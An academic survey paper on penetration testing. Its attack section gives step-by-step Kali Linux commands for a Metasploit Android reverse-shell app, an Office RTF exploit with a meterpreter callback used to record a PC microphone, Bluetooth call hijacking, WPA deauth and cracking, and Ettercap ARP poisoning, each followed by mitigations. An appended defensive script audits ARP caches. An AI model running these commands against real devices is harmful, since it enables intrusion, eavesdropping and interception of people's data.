Penetration Testing: Concepts, Attack Methods, and Defense Strategies

Matthew Denis, Carlos Zena, Thaier Hayajneh
Computer Science Department
School of Engineering and Computing Sciences
New York Institute of Technology
Old Westbury, NY, USA
{mdenis02, czena, thayajne}@nyit.edu

Abstract— Penetration testing helps to secure networks and highlights security issues. In this paper we investigate different aspects of penetration testing, including tools, attack methodologies, and defense strategies. More specifically, we performed different penetration tests using private networks, devices, and virtualized systems and tools. We predominantly used tools within the Kali Linux suite. The attacks we performed included: smartphone penetration testing, hacking a phone's Bluetooth, traffic sniffing, hacking WPA-protected Wi-Fi, a man-in-the-middle attack, spying (accessing a PC microphone), and hacking a remote PC via IP and open ports using advanced port scanner. The results are then summarized and discussed. The paper also outlines the detailed steps and methods used while conducting these attacks.

Keywords-penetration testing; Kali Linux; Metasploit; defense strategies; Man-in-the-middle attack

I. INTRODUCTION

Penetration testing is a simulation of an attack to verify the security of a system or environment to be analyzed. This test can be performed through physical means utilizing hardware, or through social engineering. The objective of this test is to examine, under extreme circumstances, the behavior of systems, networks, or personnel devices, in order to identify their weaknesses and vulnerabilities. In terms of tools, there exist penetration testing tools which simply analyze a system, as well as ones which actually attack the system to find vulnerabilities.

One may assume that penetration testing is essentially port scanning, which is not the case. To give an analogy, if a network or host system is a house, port scanning would be looking with binoculars at the doors and windows to find potential entry points. A step above that would be vulnerability assessment/management, which in this case would be sending a home inspector with a focus on security to the house, who inspects different aspects of the house and gives critiques and suggestions as to things that could be improved in its security. Penetration testing in this scenario would be getting someone to actually try to break into the house to truly find the security faults and weak points of the house.

Penetration testing can be automated with software applications, or it can be performed manually. Either way, the process includes gathering information about the target system before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real), and reporting back the findings. The main objective of penetration testing is to determine the security weaknesses. A penetration test can also be used to: 1) test an organization's security policy compliance; 2) test employee security awareness; and 3) test an organization's ability to respond to security incidents.

There are four typical types of penetration testing: external testing, internal testing, blind testing, and double blind testing [11]. An external test targets a company's externally visible servers or devices, such as domain name servers (DNS), e-mail servers, Web servers or firewalls. The objective in this case is to find out whether an outside attacker can gain illegitimate access and what level of access he can get. An internal test simulates an inside attack behind the firewall by an authorized user with standard access privileges. A blind test simulates the actions and procedures of a real attacker by strictly limiting the information given beforehand to the person or team performing the test. Double blind testing takes the blind test even further, in that only a few individuals within the organization are aware that a test is being conducted.

There are many different tools that can be used for penetration testing. Several are available on the market that one can download and use for free. Many of them can even be customized; these are known as Open Source tools [2]. For example, the testing tool Kali Linux has its own built-in penetration tools; however, you can download and install additional tools on it. Most of these programs are being developed for Linux, with only a handful being developed for Windows or Mac.

There are also several penetration testing software packages that one can purchase. Some of them cost as little as 10 dollars for their license, and others may cost thousands of dollars. Examples of these tools include:

• Kali Linux – A Linux-based OS containing a suite of penetration tools.
• Metasploit – An advanced framework used for pen-testing that contains command-line and GUI interfaces.
• Wireshark – A protocol analyzer with a GUI.
• w3af – A web application attack and audit framework.
• John The Ripper – A password cracker.
• Nessus – A very robust vulnerability identifier.
• Nmap – A network mapper, as the name suggests, that aids in understanding the characteristics of any target network.
• Dradis – An open source framework that helps with maintaining the information that can be shared among the participants of a pen-test.
• BeEF – BeEF is short for “Browser Exploitation Framework”, and focuses on web browsers.

There are a variety of penetration testing tools available, with some being customizable to improve their productivity. The use of each tool depends on the environment or network to be tested. These tools have specific objectives, with manuals and guidance on how to use them as well as videos on YouTube. One can easily find quite a number of samples to follow and GUI guides to perform a penetration test without being an expert in the field. One must understand that permission is needed to do a penetration test on an outside system or network. However, one can also create as many virtual machines as needed on one's own system and recreate scenarios to test.

The purpose of this paper is to explain the use of, and share some concepts for better understanding, penetration testing. In our explanation of penetration testing we use the most common, simple and general concepts to make it clear and easy for readers with different backgrounds to use and understand the tools. In particular, this paper presents different penetration tests using private networks, devices, and virtualized systems and tools. We predominantly used tools within the Kali Linux suite. The attacks we performed included: smartphone penetration testing, hacking a phone's Bluetooth, traffic sniffing, hacking WPA-protected Wi-Fi, a man-in-the-middle attack, spying (accessing a PC microphone), and hacking a remote PC via IP and open ports using advanced port scanner. The results are then summarized and discussed.

The remaining sections of this paper are organized as follows. Section 2 discusses the details of the attacks and tests that are performed in this paper. The mitigation and defense strategies are discussed in Section 3. Section 4 presents our results and discussion, and finally Section 5 concludes the paper.

II. ATTACKS AND TESTS

An efficient penetration tool which we utilized in this paper is Kali Linux. This tool is an operating system built for hacking and penetrating systems. Building your own hacking tool to compromise or attack systems is time consuming, arduous and tedious. Nowadays, existing tools like Kali Linux facilitate this task; anyone can download it as with any other application, and it comes with a whole built-in suite of penetration and exploitation tools. Kali is an open-source Linux distribution downloadable from www.kali.org for free. It can run on many different platforms, even on low-resource devices such as the Raspberry Pi. Some notable features of Kali Linux are:

• It contains over 600 penetration testing tools
• It is completely customizable
• It is FHS compliant, i.e. it adheres to the Filesystem Hierarchy Standard, allowing Linux users to easily locate supported files, libraries, binaries, etc.
• It supports a wide range of wireless devices
• It has the latest injection patches included
• It was developed in a secure environment by a small group of individuals
• It contains GPG signed packages and repositories
• It has multi-language support

It is common to refer to Kali Linux as a “Platform” as it is required to use a virtual machine to install this software to test its built-in tools. Kali is actually installed in the virtual machine as an environment to find vulnerabilities or constraints in the system that one wants to analyze. For our test, we used Kali Linux as a virtual machine in VMware. On the other hand, Kali can be installed on a computer as the main operating system (OS). The poor GUI (though it has been improved over the years) makes the OS very particular and not attractive to everyone.

In this section we describe several penetration attacks and tests that we conducted in this paper. All these attacks were performed using our private networks, devices, and virtualized systems.

A. Smartphone Penetration Testing

In this section we explain how to remotely take control over an Android device (an LG G2x running Android Gingerbread), using Kali Linux. We created a deployable application using Metasploit and Kali Linux. Firstly, we opened a terminal in Kali Linux and entered the command ~# msfpayload android/meterpreter/reverse_tcp LHOST=our IP address LPORT=anyport(8080 or 4444) R > evilapp.apk [19]. From there the evilapp.apk application was generated in the home folder, and we loaded up Metasploit and entered the commands: use exploit/multi/handler, and then set payload android/meterpreter/reverse_tcp. We then set the lhost to our intended IP address, and entered set lport 8080. This makes the console start listening on that IP address at port 8080. Then we installed evilapp.apk on the target device. With the device connected to the internet, we opened the app and could see the connected device in the console terminal. At this point we had full access to the device from the terminal and could: retrieve contact information; take a picture from the device's camera; stream sound from the microphone; retrieve all messages; or access the device file manager.

B. Hacking Phone Bluetooth

In this section we describe how to hack a phone's Bluetooth. Again we used an LG G2x running Android Gingerbread, an HP Envy17t laptop which had Bluetooth, and a virtualized Kali Linux in VMware. This method can also be used to hack an iPhone's or Windows Phone's Bluetooth. We started by loading up Bluesnarfer in Kali, which is a Bluetooth bluesnarfing utility. We opened a terminal and configured rfcomm, then pinged to find potential Bluetooth-enabled devices, using the l2ping <victim mac addr> command. From there we browsed the victims for rfcomm channels to connect to the phone using
the command sdptool browse --tree --l2cap <mac addr>. With that, Bluesnarfer was set up and we had access to the text messages of the Bluetooth-connected phone. We could also make phone calls by using the command bluebugger -m <victim's name> -c 7 -a <mac addr> Dial <number> [20].

C. Accessing a PC microphone

In this section we describe how we used Kali Linux to effectively set up our test system as a “bug” for spying. We started by looking for an exploit within Windows 7 (the OS of our test system). We found that Microsoft revealed that hackers had found a vulnerability in Microsoft Word and Office Web Apps (MS14-017 – Critical) that could allow remote code execution [22]. From there we booted Kali, went to Metasploit and loaded the exploit with the command msf > use exploit/windows/fileformat/ms14_017_rtf [21]. Through entering “info” and “show options” we saw that the option we needed to fill was FILENAME, and also that the exploit works only on Office 2010, which our test system had. We set the FILENAME to “testfile.rtf” and the payload to place within the file, using meterpreter, which allowed us to set up a Linux terminal on the victim's computer where many basic Linux commands can be used. We did this with the command msf > set PAYLOAD windows/meterpreter/reverse_tcp. Next, we set the LHOST, which is the IP of our attacking system, so that the payload could call back when it is executed on the test machine. Next we entered “exploit”, which created a Word file named “testfile”, and then established a multi-handler to receive the connection back to our attacking system. This is done with the commands msf > use exploit/multi/handler and msf > set PAYLOAD windows/meterpreter/reverse_tcp; then we set the LHOST to the IP of the attacking system [21]. With the malicious file created, we sent it as an attachment to an email in the test machine. Once it was executed on the test machine, we had a meterpreter session with that computer. From there we had many options, but we chose to see if we could enable the microphone on the laptop and record sounds. Metasploit has a Ruby script which enables the microphone on the target machine and records all nearby sounds and possibly conversations. We did this by entering meterpreter > run sound_recorder -l /root [21]. This started the microphone on the test machine and set it to store the recorded sounds in a file in the root directory, which could be heard by simply opening the stored file on the system.

D. Traffic Sniffing

As for sniffing the traffic, an efficient tool within Kali Linux that can accomplish this is Wireshark, which is the world's foremost network protocol analyzer. We used it to sniff the traffic on our network. The “gksudo” command opens Wireshark in Kali Linux [23]. From there we just selected “interface list”, selected our network, and clicked start, which allowed us to see all the packets traversing the network.

E. Hacking WPA Protected Wifi

Hacking WPA and WPA2 networks is one of the attacks that Kali Linux is most popular for. In this test we attempted to hack WPA-protected Wi-Fi with the use of Kali Linux, Aircrack-ng, an Alfa Network AWUS036H 802.11 b/g Long-Range USB Adapter, and a word list to attempt to crack the passphrase. We performed this test on a wireless network that we set up.

We started by logging in to Kali Linux as root and plugging the Alfa Network wireless card into the laptop. We then disconnected the system from all wireless networks. We opened a terminal and entered airmon-ng, which listed the available wireless cards that support monitor mode, and the Alfa card popped up. We then used airmon-ng start followed by the interface name of our wireless card. The “monitor mode enabled” message showed up, meaning the card had been placed into monitor mode. We then entered airodump-ng followed by the name of the new monitor interface. That command listed all of the wireless networks in our area and useful details about them. Once we located our network we pressed Ctrl + C to stop the process and noted the channel and BSSID of our network. We then entered airodump-ng -c [using our channel] --bssid [our bssid] -w /root/Desktop/ [our monitor interface]. The -w option and file path identify the place where airodump will save any intercepted 4-way handshakes, which are necessary to crack the password [17]. In our case we saved it to our desktop, and airodump only monitored our network. We then made another device connect to that network, forcing a four-way handshake to be sent, which we needed to capture in order to crack the password. To ensure that we captured the four-way handshake, we also used a feature of aircrack-ng called aireplay-ng to forcibly and temporarily de-authenticate the system (deauth). Doing this made the machine think that it had to reconnect with the network, causing another four-way handshake. To do this there has to be another device also connected to the network, which we connected; we then watched airodump-ng and waited for a client to show up. Once it appeared, we opened a second terminal and entered the command: aireplay-ng -0 2 -a [our router bssid] -c [our second device client bssid] followed by our monitor interface. Afterwards we watched aireplay-ng send the packets and the WPA handshake message pop up, i.e. the handshake was captured. From there we focused on the .cap file that we captured. We opened another terminal and entered aircrack-ng -a2 -b [our router bssid] -w [the path to our wordlist] /root/Desktop/*.cap [17]. This launched Aircrack into the process of cracking the password. We left this process running on the system for a few days, but it could not crack the password. We then scaled down the password to something really simple and short just for proof of concept, found and used a bigger word list, and left it running for another few hours, and it was eventually able to get the password.

It is also worth mentioning that wireless networks are also vulnerable to attacks that cannot be prevented using cryptographic protocols, such as: packet dropping [25, 26], jamming [27], wormholes [28, 29] and localization [30, 31].

F. Man-in-the-Middle Attack

A man-in-the-middle (MITM) attack is one of the simplest, but also essential, steps to gaining control over a network. Once an attacker has performed a MITM attack on a network, he will be able to perform a number of other side attacks. These include: intercepting emails, logins, and chat messages, cutting a victim's internet connection, and many others. In this section we describe the MITM attack that we performed using Kali Linux.

We started Kali Linux, logged in as a root user, and entered the command echo 1 > /proc/sys/net/ipv4/ip_forward to enable IP forwarding, which is required so that the victim device
maintains its connection while we ARP poison it [18]. Ettercap does not come ready to work by default, so we needed to make some necessary edits. We opened a terminal and entered leafpad /etc/ettercap/etter.conf. In the text that popped up we changed the “ec_uid” and “ec_gid” values to zero, replacing the number 65534 with 0's. We then searched for the phrase “iptables”, and uncommented two lines by removing the # symbols. Afterwards we opened a terminal and started Ettercap-gtk, clicked Sniff in the toolbar and selected Unified Sniffing, then selected the interface we wanted. Now with Ettercap loaded into attack mode, we clicked on Hosts and selected Scan for hosts. We waited until we observed “hosts added to the host list…” in the command box. We viewed the host list and selected the IP address of our router (192.168.1.1), and made it Target 1, and then selected the IP of our test machine and clicked Add to Target 2. We then clicked Mitm on the toolbar and selected ARP poisoning. Ettercap then ARP poisoned our test machine and router. From there the test machine was able to connect to the internet without knowing that there was an attacker between it and the router. From there it was possible to use tools such as URLsnarf and SSLstrip to sniff out internet traffic information, or use etterfilters to disconnect machines from the internet.

G. Hacking remote Access PC

In this section we describe how to hack a remote computer through IP and open ports. The steps to perform this attack included:

1. Confirming the computer or website you want to hack
2. Finding out their IP address
3. Making sure their IP address is online
4. Scanning for open ports
5. Gaining access to that machine through open ports
6. Brute forcing username and password

For this test we created a simple website using HTML and made it accessible to the devices on the same network (the attack and test machines). To get the IP of the test machine we pinged the site, and ensured we received the replies, verifying it was online. From there we used advanced port scanner to scan all the open ports. We then used telnet to access the ports, using the command telnet [here using the IP for the site residing on the test machine] [here using the desired port number]. From here we were prompted to enter login information. We attempted to brute force it, after which one can perform a number of attacks.

III. DEFENSE AND MITIGATION STRATEGIES

Fighting against these tools is a challenge; however, the damage is less when you know your vulnerabilities and attempt to fix or patch them. The main vulnerability in a system is its own operating system (e.g. “Windows”); hence, it must always be updated with all the patches to prevent intruders from gaining access. In this section we outline Kali Linux attack mitigation strategies for the penetration tests that we performed.

A. Smartphone Penetration Mitigation Strategies

In our test using Kali Linux and Metasploit, we showed one way to gain full access to an Android device. To protect against this attack, one should check the application carefully before installing, for instance by thoroughly checking app permissions before installing. Google filters all apps that are placed on the Play Store; however, there are still some applications containing malicious code that may get through. Also, if a phone is stolen and used by a hacker, even a phone with a passcode on it can have its information retrieved in ways similar to the one performed and described. For this reason we would recommend that those who realize their phone has been stolen quickly (in the case of Android phones) go to “https://www.google.com/android/devicemanager?u=0” on a computer or tablet and log in to their Google account, from which they can delete all the information on their device, making it impossible, or at least harder, to retrieve their information.

B. Hacking Phone Bluetooth Mitigation

One of the most effective methods to protect your phone (or tablet) from attackers gaining access through Bluetooth is to simply turn off Bluetooth on these devices. Most people do not use any Bluetooth-related features on their devices and would not lose any functionality by having Bluetooth perpetually off. For people who do often use Bluetooth on their devices, we would suggest that they only turn on Bluetooth when needed. Leaving it on needlessly exposes them to Bluetooth threats and attacks like the one we performed and described.

C. Mitigation Strategies for Microphone Access

An effective and simple method to prevent this type of attack is to make sure you don't open any unsolicited emails, and especially don't click on any links or files in unsolicited emails. That is how we were able to place the command and control code onto the test system. We just made a simple email and called the file “testfile”, but an actual attacker on the internet would use things such as social engineering to make the email extremely appealing and even make it look like an official email from a well-known company, with things such as your name and other personal information they were able to glean. We would also recommend using an email client such as Gmail, instead of ones such as Yahoo Mail, Aim Mail, or Hot Mail. We found that Gmail allows the minimum amount of unsolicited email to enter the inbox, and this reduces the chance that one may be clicked, allowing for the type of attack we performed.

D. Mitigation Strategies for Traffic Sniffing

There is no effective method to completely prevent attackers from sniffing your network, though there are things that can be done to make it harder for the attacker to sniff your network and gain useful information. For wireless networks, for example, one should keep the SSID hidden and only known to the devices that are connected to the network. Also, the use of encryption when doing any important online actions makes sniffed traffic reveal no pertinent information. That calls for actions such as making sites use HTTPS (Port 443) instead of HTTP (80), and making sure encryption is on for your email services.

E. Mitigation Strategies against Hacking Protected WiFi

There are quite a few ways and steps one can take to prevent their wireless network from being hacked. These include:

1. Use WPA2 (WPA2-AES) if available
2. By all means never use WEP for wireless security, as it is totally insecure
3. Do not base your wireless password on any dictionary words.
4. Within your router settings, hide your SSID, the name of the wireless network
5. Use the router feature which allows filtering where you can specify the MAC addresses that are allowed to connect.

F. Man-in-the-Middle Attack Mitigation

In terms of ways to protect oneself against man-in-the-middle attacks like the one we performed with Kali and Ettercap, there are a couple of methods:

1. ARP detection software – There are a few ARP detection programs, and for Windows machines they require installing special drivers for your wireless cards.

2. Static ARP entries – Here you type in a few simple commands and your computer basically becomes “unarpable”. When an attacker performs an ARP MITM attack, their computer sends an ARP packet to the victim's machine telling it that the attacker's MAC address is the router's. The victim's machine is fooled and starts sending its data to the attacker. However, when you enter a static ARP entry, you are telling your computer that the router's MAC address is permanent and will not be changed; thus your computer ignores any phony ARP packets sent by the attacker.

G. Malicious Remote Access Defense Strategy

In our test we tried to exploit telnet to gain remote access. The protocol enables users to remotely connect to devices. However, with Telnet, login information and commands are sent in clear text and can be compromised. Due to this we recommend the use of SSH instead for remote access, as this gives you a secure, encrypted connection to your remote devices.

IV. RESULTS AND DISCUSSION

Figure 1: Causes of systems' weaknesses

The graph in Figure 1 shows the typical reasons and causes of networks' or systems' weaknesses and vulnerabilities, and their percentages. The graph in Figure 2 shows the seven attacks we performed, and whether they were successful or not. The red color indicates successful attacks, the blue color indicates unsuccessful attacks, and orange means the attack was partially successful (e.g. cracking WPA Wi-Fi security, which we were able to break, though only after we scaled down the password and used a bigger word list).

Figure 2: Attacks success rate

When taking both charts into consideration, we think man-in-the-middle attacks are the type of attack network administrators should particularly be prepared for. Lack of OS hardening and missing patches were the highest weaknesses, both of which may lead to successful MITM attacks. Observing the relative ease with which we were able to perform it, advanced hackers may have no difficulty exploiting those weaknesses.

The same tools used to prevent attacks may also be used by others to gather data and compromise large companies. Usually, medium and large companies exercise penetration testing to prevent outside and inside attacks that would cost more than doing a penetration test. A firewall, an antivirus or sensors that are all over the network may not prevent cyber attacks if the companies do not really know the weaknesses and vulnerabilities of their system or network [36]. Finally, it is also critical for the security protocols to adopt lightweight cryptographic techniques or use security levels with different ciphers' complexity [32][33][34][35].

V. CONCLUSIONS

Penetration testing is an important subject that IT administrators should be aware of. With the internet growing every day, the computer security field has become a very challenging topic not only for companies but also for regular users. It is time to realize that we are no longer secure just by having an antivirus. Today there is more of a chance of you getting hacked than getting mugged. Penetration tools have been getting a lot of attention, since there are no limitations on their production. Open source tools can be modified according to individual needs. Imagine a penetration tool to hack satellites and change predictions for weather patterns, or maybe change the time, or even worse, to activate nuclear weapons. Nowadays, using these tools, we can hack medical devices, or even cars. This paper detailed critical penetration testing attacks and discussed potential mitigation techniques.

REFERENCES

[1] Anley, C.; Heasman, J.; Lindner, F. and Richarte, G. The Shellcoder's Handbook: Discovering and Exploiting Security Holes. 2007. Wiley.
[2] St. Laurent, Andrew M. Understanding Open Source and Free Software Licensing. 2004. O'Reilly Media.
[3] Piscitello, David. “Your First Penetration Test”. WatchGuard LiveSecurity. URL: http://www.corecom.com/external/livesecurity/pentest.html (retrieved 5 December, 2015)
[4] OUSPG Glossary of Vulnerability Testing Terminology. URL: http://www.ee.oulu.fi/research/ouspg/sage/glossary/ (retrieved 5 December, 2015)
[5] Kurtz, George and Chris Prosise. “Penetration Testing Exposed - Part 3 ‘Audits, Assessments & Tests (Oh, My)’”. September 2000. Information Security Magazine. URL: http://www.infosecuritymag.com/articles/september00/features3.shtml (retrieved 5 December, 2015)
[6] Middleton, Bruce. Conducting Network Penetration and Espionage in a Global Environment. 2014. Auerbach Publications.
[7] Internet Security Systems. “Network and Host-based Vulnerability Assessment”. URL: http://documents.iss.net/whitepapers/nva.pdf (retrieved 7 December, 2015)
[8] Skoudis, Ed. Security 560: Network Penetration Testing & Ethical Hacking. SANS Institute: 2009
[9] Skoudis, Ed. Security 504: Hacker Techniques, Exploits & Incident Handling. SANS Institute: 2006
[10] Chen, H., Li, F. H. & Xiao, Y. (2011) Handbook of Security and Networks. World Scientific Publishing Co.
[11] Weissman, C. (1993). Security penetration testing guideline. In Handbook for the Computer Security Certification of Trusted Systems, Center for Secure Information Technology, Naval Research Laboratory (NRL), US, 1-66.
[12] Granneman, Scott. Linux Phrasebook. Indianapolis, Ind.: Sams, 2006. Print.
[13] Research, P. (2013, December 27). Mobile Technology Fact Sheet. Retrieved 9 December, 2015, from Pew Research Internet Project: http://www.pewinternet.org/fact-sheets/mobile-technology-fact-sheet/
[14] Labbe, Keith, Rowe, Neil & Fulp, J.D. (2006). A Methodology for Evaluation of Host Based Intrusion Prevention Systems and its Applications, 2006 IEEE Information Assurance Workshop
[15] Hardikar, A. (2013, 06). Penetration testing practice lab - vulnerable apps / systems. Retrieved from http://www.amanhardikar.com/mindmaps/Practice.html
[16] Weidman, Georgia, and Peter Van Eeckhoutte. Penetration Testing. No Starch Press Inc., 2014. Print.
[17] Encarnacion, Lewis. “How To Hack WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng” URL: http://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html (retrieved 15 November, 2015)
[18] Encarnacion, Lewis. “Perform A Man In The Middle Attack With Kali Linux & Ettercap” URL: http://lewiscomputerhowto.blogspot.com/2014/03/perform-man-in-middle-attack-with-kali.html (retrieved 8 November, 2015)
[19] Shahid, Mahammad. “Hack to Remotely Control Any Android Device Using Kali Linux or Ubuntu” URL: http://www.letshacksomething.com/2015/01/hack-to-control-any-android-device.html (retrieved 11 November, 2015)
[20] Root. (2014, August 17). “How To Hack Phones Bluetooth With Kali Linux And Backtrack”. URL: http://hack.training/hack-phones-bluetooth-kali-linux-backtrack/ (retrieved 15 November, 2015)
[21] Occupytheweb. (2014 April). “Hack Like a Pro: How to Spy on Anyone, Part 1 (Hacking Computers)”. URL: http://null-byte.wonderhowto.com/how-to/hack-like-pro-spy-anyone-part-1-hacking-computers-0156376/ (retrieved 1 December, 2015)
[22] Security TechCenter. (2014, April 8). “Microsoft Security Bulletin MS14-017 – Critical”. URL: https://technet.microsoft.com/en-us/library/security/MS14-017?f=255&MSPPError=-2147217396 (retrieved 4 December, 2015)
[23] Dalziel, Henry. (2013, August 17). “Wireshark basics 101: A simple concise tutorial for beginners”. URL: https://www.concise-courses.com/security/wireshark-basics/ (retrieved 8 December, 2015)
[24] Luka. “Hack Remote Computer Via Ip And Open Port” URL: http://kalilinuxfans.blogspot.com/2013/06/hack-remote-computer-via-ip-and-open.html (retrieved 9 December, 2015)
[25] Hayajneh, T.; Krishnamurthy, P.; Tipper, D.; Kim, T. Detecting malicious packet dropping in the presence of collisions and channel errors in wireless ad hoc networks. In Proceedings of the IEEE International Conference on Communications, Dresden, Germany, 14–18 June 2009; pp. 1–6.
[26] Hayajneh, T.; Almashaqbeh, G.; Ullah, S. A Green Approach for Selfish Misbehavior Detection in 802.11-Based Wireless Networks. Mobile Netw. Appl. 2015, 20, 623–635.
[27] Panyim, K.; Hayajneh, T.; Krishnamurthy, P.; Tipper, D. On limited-range strategic/random jamming attacks in wireless ad hoc networks. In Proceedings of the IEEE 34th Conference on Local Computer Networks, Zurich, Switzerland, 20–23 October 2009; pp. 922–929.
[28] Hayajneh, T.; Krishnamurthy, P.; Tipper, D.; Le, A. Secure neighborhood creation in wireless ad hoc networks using hop count discrepancies. Mobile Netw. Appl. 2012, 17, 415–430.
[29] Hayajneh, T.; Krishnamurthy, P.; Tipper, D. Deworm: A simple protocol to detect wormhole attacks in wireless ad hoc networks. In Proceedings of the IEEE 3rd International Conference on Network and System Security, Gold Coast, Australia, 19–21 October 2009; pp. 73–80.
[30] Hayajneh, T.; Doomun, R.; Krishnamurthy, P.; Tipper, D. Source—Destination obfuscation in wireless ad hoc networks. Secur. Commun. Netw. 2011, 4, 888–901.
[31] Doomun, R.; Hayajneh, T.; Krishnamurthy, P.; Tipper, D. Secloud: Source and destination seclusion using clouds for wireless ad hoc networks. In Proceedings of the IEEE Symposium on Computers and Communications, Sousse, Tunisia, 5–8 July 2009; pp. 361–367.
[32] T. Hayajneh, S Ullah, BJ Mohd, K. Balagani, “An Enhanced WLAN Security System with FPGA Implementation for Multimedia Applications,” IEEE Systems Journal, 2015. doi: 10.1109/JSYST.2015.24247.
[33] T. Hayajneh, R. Doomun, G. Al-Mashaqbeh, BJ Mohd “An energy-efficient and security aware route selection protocol for wireless sensor networks,” Security and Communication Networks, John Wiley, Vol. 7, No. 11, pp 2015-2038, 2014. DOI: 10.1002/sec.915
[34] Bassam J. Mohd, Thaier Hayajneh and Athanasios V. Vasilakos, A Survey on Lightweight Block Ciphers for Low-Resource Devices: Comparative Study and Open Issues, Journal of Network and Computer Applications, doi: 10.1016/j.jnca.2015.09.001
[35] Bassam J. Mohd, Thaier Hayajneh and Athanasios V. Vasilakos, A Survey on Lightweight Block Ciphers for Low-Resource Devices: Comparative Study and Open Issues, Journal of Network and Computer Applications, doi: 10.1016/j.jnca.2015.09.001.
[36] T. Hayajneh, BJ Mohd, A. Itradat, AN Quttoum “Performance and Information Security Evaluation with Firewalls,” International Journal of Security and Its Applications, SERSC, Vol. 7, No. 6, pp 355-372, 2013. (DOI: 10.14257/ijsia.2013.7.6.36)
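
Added example (not part of the original paper): Section III.F recommends ARP detection software and static ARP entries against the ARP-poisoning test of Section II.F. The Python script below is one way to implement such a check on a Linux host by auditing the text printed by "ip neigh show"; the snapshots, the MAC addresses (taken from the RFC 7042 documentation range), the host IPs other than the paper's router 192.168.1.1, and all function names are constructed for illustration.

```python
"""Audit ARP-cache snapshots for signs of ARP poisoning (added example)."""
import re
from collections import defaultdict

# One IPv4 neighbour line as printed by `ip neigh show`, for example:
#   192.168.1.1 dev wlan0 lladdr 00:00:5e:00:53:01 REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<state>[A-Z]+)$"
)

# Constructed sample data: known-good router MAC and three cache snapshots.
PINNED = {"192.168.1.1": "00:00:5e:00:53:01"}

BEFORE = """\
192.168.1.1 dev wlan0 lladdr 00:00:5e:00:53:01 REACHABLE
192.168.1.23 dev wlan0 lladdr 00:00:5e:00:53:10 STALE
192.168.1.50 dev wlan0 lladdr 00:00:5e:00:53:66 STALE
192.168.1.77 dev wlan0 FAILED
"""

# Same network while the host at .50 answers ARP on behalf of the router.
POISONED = """\
192.168.1.1 dev wlan0 lladdr 00:00:5e:00:53:66 REACHABLE
192.168.1.23 dev wlan0 lladdr 00:00:5e:00:53:10 STALE
192.168.1.50 dev wlan0 lladdr 00:00:5e:00:53:66 REACHABLE
"""

# Router entry pinned as a static (PERMANENT) entry, as Section III.F advises.
HARDENED = """\
192.168.1.1 dev wlan0 lladdr 00:00:5e:00:53:01 PERMANENT
192.168.1.23 dev wlan0 lladdr 00:00:5e:00:53:10 STALE
192.168.1.50 dev wlan0 lladdr 00:00:5e:00:53:66 STALE
"""


def parse_neigh(text):
    """Return {ip: (mac, state)}; unresolved entries (no lladdr) are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = (m.group("mac").lower(), m.group("state"))
    return table


def audit(table, pinned, previous=None):
    """Return a list of (kind, subject, detail) findings for one snapshot."""
    findings = []
    # 1. A pinned host (the router) must keep its known-good MAC, and its
    #    entry should be static so that forged ARP replies cannot replace it.
    for ip, good_mac in pinned.items():
        if ip not in table:
            continue
        mac, state = table[ip]
        if mac != good_mac.lower():
            findings.append(("pinned-mismatch", ip,
                             f"expected {good_mac}, saw {mac}"))
        elif state != "PERMANENT":
            findings.append(("not-static", ip,
                             f"state {state}: entry is dynamic"))
    # 2. One MAC answering for several IPs is what a poisoned cache looks
    #    like (proxy ARP and IP aliases are legitimate exceptions to review).
    owners = defaultdict(list)
    for ip, (mac, _state) in table.items():
        owners[mac].append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1:
            findings.append(("duplicate-mac", mac,
                             "claimed by " + ", ".join(sorted(ips))))
    # 3. An IP whose MAC changed since the previous snapshot.
    for ip, (old_mac, _state) in (previous or {}).items():
        if ip in table and table[ip][0] != old_mac:
            findings.append(("mac-changed", ip,
                             f"{old_mac} -> {table[ip][0]}"))
    return findings


if __name__ == "__main__":
    baseline = parse_neigh(BEFORE)
    for name, snap in (("before", BEFORE), ("poisoned", POISONED),
                       ("hardened", HARDENED)):
        print(name)
        for kind, subject, detail in audit(parse_neigh(snap), PINNED, baseline):
            print(f"  {kind:16} {subject:18} {detail}")
```

On a live host the snapshot text would come from running "ip neigh show" at intervals, with PINNED filled from the router's label or a trusted wired measurement.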